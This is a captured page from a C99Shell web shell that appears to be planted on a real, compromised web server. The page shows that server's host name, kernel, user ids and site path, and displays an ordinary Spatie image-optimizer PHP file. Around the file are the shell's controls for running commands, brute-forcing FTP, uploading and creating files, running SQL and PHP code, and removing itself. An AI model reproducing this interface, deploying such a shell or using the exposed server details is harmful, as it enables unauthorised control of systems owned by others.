!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/spatie/image-optimizer/src/   drwxr-xr-x
Free 28.88 GB of 117.98 GB (24.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OptimizerChainFactory.php (2.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\ImageOptimizer;

use 
Spatie\ImageOptimizer\Optimizers\Avifenc;
use 
Spatie\ImageOptimizer\Optimizers\Cwebp;
use 
Spatie\ImageOptimizer\Optimizers\Gifsicle;
use 
Spatie\ImageOptimizer\Optimizers\Jpegoptim;
use 
Spatie\ImageOptimizer\Optimizers\Optipng;
use 
Spatie\ImageOptimizer\Optimizers\Pngquant;
use 
Spatie\ImageOptimizer\Optimizers\Svgo;

class 
OptimizerChainFactory
{
    public static function 
create(array $config = []): OptimizerChain
    
{
        
$optimizers self::getOptimizers($config);
        
$optimizerChain = new OptimizerChain();

        foreach (
$optimizers as $optimizer => $optimizerConfig) {
            
$optimizerChain->addOptimizer(new $optimizer($optimizerConfig));
        }

        return 
$optimizerChain;
    }

    
/**
     * @return array<class-string, array>
     */
    
private static function getOptimizers(array $config): array
    {
        if (
self::configHasOptimizer($config)) {
            return 
$config;
        }

        return [
            
Jpegoptim::class => [
                
'-m' . ($config['quality'] ?? 85),
                
'--force',
                
'--strip-all',
                
'--all-progressive',
            ],
            
Pngquant::class => [
                
'--quality=' . ($config['quality'] ?? 85),
                
'--force',
            ],
            
Optipng::class => [
                
'-i0',
                
'-o2',
                
'-quiet',
            ],
            
Svgo::class => [],
            
Gifsicle::class => [
                
'-b',
                
'-O3',
            ],
            
Cwebp::class => [
                
'-m 6',
                
'-pass 10',
                
'-mt',
                
'-q ' . ($config['quality'] ?? 90),
            ],
            
Avifenc::class => [
                
'-a cq-level=' . (isset($config['quality']) ? round(63 $config['quality'] * 0.63) : 23),
                
'-j all',
                
'--min 0',
                
'--max 63',
                
'--minalpha 0',
                
'--maxalpha 63',
                
'-a end-usage=q',
                
'-a tune=ssim',
            ],
        ];
    }

    private static function 
configHasOptimizer(array $config): bool
    
{
        return (bool)
array_intersect_key($config, [
            
Jpegoptim::class => null,
            
Pngquant::class => null,
            
Optipng::class => null,
            
Svgo::class => null,
            
Gifsicle::class => null,
            
Cwebp::class => null,
            
Avifenc::class => null,
        ]);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--